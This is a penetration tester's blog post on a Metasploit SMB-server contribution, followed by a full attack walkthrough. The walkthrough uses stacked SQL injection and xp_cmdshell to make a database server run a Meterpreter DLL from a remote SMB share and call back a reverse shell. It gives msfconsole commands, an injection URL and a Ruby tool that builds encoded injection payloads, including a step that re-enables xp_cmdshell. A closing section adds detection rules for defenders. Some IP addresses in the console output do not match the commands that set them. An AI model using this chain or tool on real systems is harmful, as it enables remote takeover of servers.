One of the things we like to do at Sec-1 is contribute back to the community wherever possible. As full-time penetration testers, we regularly carry out research and development to identify new vulnerabilities, adding checks to our scanning tools to help organisations highlight areas of concern.
We also create tools to aid the rest of our teams and to contribute back to the pen-testing and wider security community.
Backed by Rapid7, the Metasploit project is the best-known open-source penetration testing tool, used by security companies and enthusiasts world-wide. It provides a framework and a collection of modules that allow penetration testers to target systems for potential vulnerabilities.
Whilst on a penetration test for a client, Matt discovered a previously unidentified vulnerability that could be exploited through a single web request, causing the target system to load a Windows Dynamic-Link Library (DLL) file from a remote server. To leverage this issue, Matt used the Metasploit framework to generate a payload DLL, which then had to be hosted on a standard Windows file share so that the target system would load it and give him administrative access.
Unhappy with the clunkiness of this process, Matt investigated whether it was possible, from within the Metasploit framework itself, to generate a payload and serve the file directly over SMB (the protocol underlying Windows file sharing) without configuring a separate share outside Metasploit. To his surprise, the project had no support for serving files over SMB, or any SMB server support at all (it could act as an SMB client, but not as a server). This presented an excellent opportunity to add core protocol support to a widely used project while developing his exploit for the target system.
Working on the Metasploit project over several weekends and late nights, Matt climbed the steep learning curve of Ruby, the language the framework is written in, and with the aid of the SMB protocol specifications and packet-capture tools implemented basic file-server support within the framework in a relatively short time frame. Over the course of the following year he worked with several members of Rapid7 to bring the 'alpha' quality code up to production standard, and it was eventually landed by Rapid7 employee Juan Vasquez.
The Metasploit project has highlighted this contribution as the longest-running pull request in the project's decade-long history. It adds support for a core protocol that can be used by several exploit modules, in various scenarios, by penetration testing teams all around the world.
As an example of how this module can be useful, imagine an ASP.NET application on a web server connecting to a back-end Microsoft SQL Server database, with the application vulnerable to stacked SQL injection, e.g.:
Running sqlmap against the URL above showed that the application is vulnerable to stacked SQL injection, that the database connection runs as the system administrator (sa), and that the 'xp_cmdshell' extended stored procedure is enabled. (Even where xp_cmdshell is disabled, an sa connection can re-enable it through sp_configure, so the sa finding is the one that really matters.) With these in place, we can use the stored procedure much like a command line to run operating-system commands on the database host. Those commands run with the privileges of the SQL Server service account: historically this was LocalSystem, although modern installs default to a less privileged virtual service account, so it is worth checking with 'whoami' first. To gain further access to the host, all we need to do now is make it load an arbitrary payload from a remote SMB share. To achieve this, we first use Metasploit to serve a Meterpreter payload:
msf > use exploit/windows/smb/generic_smb_dll_injection
msf exploit(generic_smb_dll_injection) > set FILE_NAME exploit.dll
FILE_NAME => exploit.dll
msf exploit(generic_smb_dll_injection) > set SRVHOST 220.127.116.11
SRVHOST => 18.104.22.168
msf exploit(generic_smb_dll_injection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(generic_smb_dll_injection) > set LHOST 22.214.171.124
LHOST => 126.96.36.199
msf exploit(generic_smb_dll_injection) > run
[*] Exploit running as background job.
[*] Started reverse handler on 188.8.131.52:4444
[*] File available on \\184.108.40.206\cmwQz\exploit.dll…
[*] Server started.
With the SMB server ready, all we need to do now is exploit the SQL injection and force the database server to fetch and run our payload, e.g.:
http://www.acmecorps.com/Article.aspx?ID=23; exec master..xp_cmdshell 'rundll32 \\220.127.116.11\cmwQz\exploit.dll,1'
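The one-line URL above glosses over two details that decide whether the stacked injection actually runs: the command has to survive T-SQL quoting (a single quote inside it terminates the literal early unless doubled), and the whole thing has to be URL-encoded so the browser or client does not mangle the backslashes, semicolon and quotes. The following Ruby is an added example written for this page, not code from Sec-1 or from the Metasploit module; the host, share and page names are placeholders, and the optional sp_configure stack for enabling xp_cmdshell is included because it is the step you need when sqlmap reports sa but the procedure is disabled.

```ruby
require 'uri'

# Quote a string as a T-SQL literal. A single quote inside the command must be
# doubled, otherwise it terminates the literal and the injection breaks.
def tsql_quote(str)
  "'" + str.gsub("'", "''") + "'"
end

# Build the stacked statements. With enable: true the stack first switches
# xp_cmdshell on via sp_configure, which works when the injection runs as sa.
def xp_cmdshell_stack(command, enable: false)
  stmts = []
  if enable
    stmts << "exec sp_configure 'show advanced options',1"
    stmts << 'reconfigure'
    stmts << "exec sp_configure 'xp_cmdshell',1"
    stmts << 'reconfigure'
  end
  stmts << "exec master..xp_cmdshell #{tsql_quote(command)}"
  stmts.join('; ')
end

# The rundll32 command that pulls the DLL over SMB. host/share/file are
# whatever the Metasploit SMB server printed as "File available on ...".
def rundll32_unc(host, share, file, entry = 1)
  "rundll32 \\\\#{host}\\#{share}\\#{file},#{entry}"
end

# Assemble the full GET URL. The injected value keeps the legitimate parameter
# value in front so the page's own query still succeeds and the stacked
# statements run after it. URI.encode_www_form does the percent-encoding.
def injection_url(base, param, value, command, enable: false)
  u = URI(base)
  injected = "#{value}; #{xp_cmdshell_stack(command, enable: enable)}"
  u.query = URI.encode_www_form(param => injected)
  u.to_s
end

if $PROGRAM_NAME == __FILE__
  # Hypothetical host and share, not the values shown on the page.
  cmd = rundll32_unc('203.0.113.10', 'cmwQz', 'exploit.dll')
  puts injection_url('http://www.acmecorps.com/Article.aspx', 'ID', '23', cmd, enable: true)
end
```

Send the printed URL with any HTTP client; if the page returns normally but no SMB connection arrives at the Metasploit server, suspect egress filtering of TCP 445 before suspecting the injection.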
Provided the database server is not sufficiently segmented and can reach file shares on the Internet (outbound SMB on TCP port 445 is blocked at most perimeters, so in practice this chain is far more likely to succeed from an internal network position), the server will happily load the DLL straight from the share into rundll32. Because the DLL is mapped directly from the remote share rather than written to the local disk, simple file-based anti-virus scanning is often bypassed, and a Meterpreter session is created on the handler. We can then interact with it using the 'sessions' command in msfconsole (for example 'sessions -i 1'). Note that the reverse_tcp payload additionally needs the target to reach LHOST on the handler port, 4444 in the example above.
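The defender's view of the same chain is worth having alongside the offensive one, since the anti-virus bypass above does not extend to process telemetry: xp_cmdshell always spawns cmd.exe as a child of sqlservr.exe, and the rundll32 it launches names a UNC path on its command line. The Ruby below is an added example, not part of the original post or of any Sec-1 or Metasploit tooling; the events are constructed Sysmon-style process-creation records with a placeholder attacker address, and the two rules are the minimum a detection engineer would write for this technique.

```ruby
# Constructed Sysmon Event ID 1 style process-creation events (not real logs).
# Single-quoted Ruby strings keep a lone backslash, so '\\\\' is a UNC prefix.
EVENTS = [
  { parent_image: 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe',
    image: 'C:\Windows\System32\cmd.exe',
    cmdline: 'cmd.exe /c rundll32 \\\\203.0.113.10\cmwQz\exploit.dll,1' },
  { parent_image: 'C:\Windows\System32\cmd.exe',
    image: 'C:\Windows\System32\rundll32.exe',
    cmdline: 'rundll32 \\\\203.0.113.10\cmwQz\exploit.dll,1' },
  { parent_image: 'C:\Windows\explorer.exe',
    image: 'C:\Windows\System32\rundll32.exe',
    cmdline: 'rundll32 C:\Windows\System32\shell32.dll,Control_RunDLL' },
  { parent_image: 'C:\Windows\System32\services.exe',
    image: 'C:\Windows\System32\svchost.exe',
    cmdline: 'svchost.exe -k netsvcs' }
].freeze

# Matches \\host\share at the start of a UNC path.
UNC_RE = /\\\\[^\\\s]+\\[^\\\s]+/

# Binaries that load code from a path given on their command line.
UNC_LOADERS = %w[rundll32.exe regsvr32.exe].freeze

# Last path component of a Windows path, lower-cased (File.basename does not
# split on backslashes on non-Windows hosts).
def basename_win(path)
  path.split(/[\\\/]/).last.to_s.downcase
end

# Returns [reason, event] pairs for every event that trips a rule.
# Rule 1: any child of sqlservr.exe means xp_cmdshell (or similar) ran.
# Rule 2: rundll32/regsvr32 pulling its DLL from a UNC path.
def flag_events(events)
  events.flat_map do |ev|
    reasons = []
    if basename_win(ev[:parent_image]) == 'sqlservr.exe'
      reasons << 'child process of sqlservr.exe (xp_cmdshell use)'
    end
    image = basename_win(ev[:image])
    if UNC_LOADERS.include?(image) && (m = UNC_RE.match(ev[:cmdline]))
      reasons << "#{image} loading from UNC path #{m[0]}"
    end
    reasons.map { |r| [r, ev] }
  end
end

if $PROGRAM_NAME == __FILE__
  flag_events(EVENTS).each { |reason, ev| puts "#{reason}: #{ev[:cmdline]}" }
end
```

Rule 1 fires on every xp_cmdshell invocation, malicious or not, so on hosts where DBAs legitimately use it the rule should be scoped to unexpected child images; rule 2 is far more specific and is the one to alert on directly. Both depend on process-creation logging (Sysmon or Windows 4688 with command-line auditing) being enabled on the database host.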